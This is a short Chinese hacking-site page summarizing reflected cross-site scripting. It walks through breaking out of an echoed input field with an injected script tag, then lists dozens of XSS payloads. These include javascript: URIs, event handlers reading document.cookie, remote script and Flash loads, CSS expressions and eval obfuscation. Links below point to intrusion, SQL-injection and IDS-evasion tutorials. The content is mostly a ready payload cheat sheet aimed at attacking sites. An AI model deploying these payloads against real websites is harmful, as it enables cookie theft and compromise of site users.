|
[推荐]跨站式脚本总结
实施方式
我们来试一把Reflected cross-site scripting。当我们在某网站输入参数XXX,发现参数XXX原样的出现在了页面源码中:
| 以下是引用片段: <input type="text" class="Seach" name="w" value="XXX" /> |
OK,可以开始做文章了,我们将XXX替换为:
| 以下是引用片段: abc"/><script>alert(’haha’)</script><a href=" |
,返回的HTML代码如下:
| 以下是引用片段: <input type="text" class="Seach" name="w" value="abc"/><script>alert(’haha’)</script><!--" /> |
这样,<script>alert(’haha’)</script>被执行了。这里再举例一些XSS攻击行为:
| 以下是引用片段: <IMG SRC="javascript:alert(’XSS’);"> <IMG SRC=javascript:alert(’XSS’)> <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"> <IMG SRC="jav ascript:alert(’XSS’);"> <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <iframe src=http://example.com/scriptlet.html < <INPUT TYPE="IMAGE" SRC="javascript:alert(’XSS’);"> <BODY BACKGROUND="javascript:alert(’XSS’)"> <BODY ONLOAD=alert(document.cookie)> <BODY onload!#$%&()*~+-_.,:;?@[/|"]^`=alert("XSS")> <IMG DYNSRC="javascript:alert(’XSS’)"> <IMG DYNSRC="javascript:alert(’XSS’)"> <BR SIZE="&{alert(’XSS’)}"> <IMG SRC=’vbscript:msgbox("XSS")’> <TABLE BACKGROUND="javascript:alert(’XSS’)"> <DIV STYLE="width: expression(alert(’XSS’));"> <DIV STYLE="background-image: url(javascript:alert(’XSS’))"> <STYLE TYPE="text/javascript">alert(’XSS’);</STYLE> <STYLE type="text/css">BODY{background:url("javascript:alert(’XSS’)")}</STYLE> <?=’<SCRIPT>alert("XSS")</SCRIPT>’?> <A HREF="javascript:document.location=’http://www.example.com/’">XSS</A> <IMG SRC=javascript:alert(’XSS’)> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> a="get"; b="URL("""; c="javascript:"; d="alert(’XSS’);"")"; eval(a+b+c+d); |
更加详细的列表请参见 5
| 入侵网站必备经典语句 | 01-17 |
| 说说session | 10-23 |
| 新or注入教程 | 09-10 |
| Mssql2005注入命令总结 | 07-30 |
| 阿D常用注入命令汇总 | 07-30 |
| Penetration Testing 渗透测试 | 07-04 |
| Exploit Sites 和0day公布的站点 | 06-18 |
| 3389得到肉鸡后的命令 | 06-18 |
| Cmd模式下的入侵技术大全 | 05-30 |
| 阿D常用注入命令整理 | 05-17 |
| opendatasource学习记录 | 05-14 |
| SQL Injection规避入侵检测技术总 | 05-06 |
您现在的位置: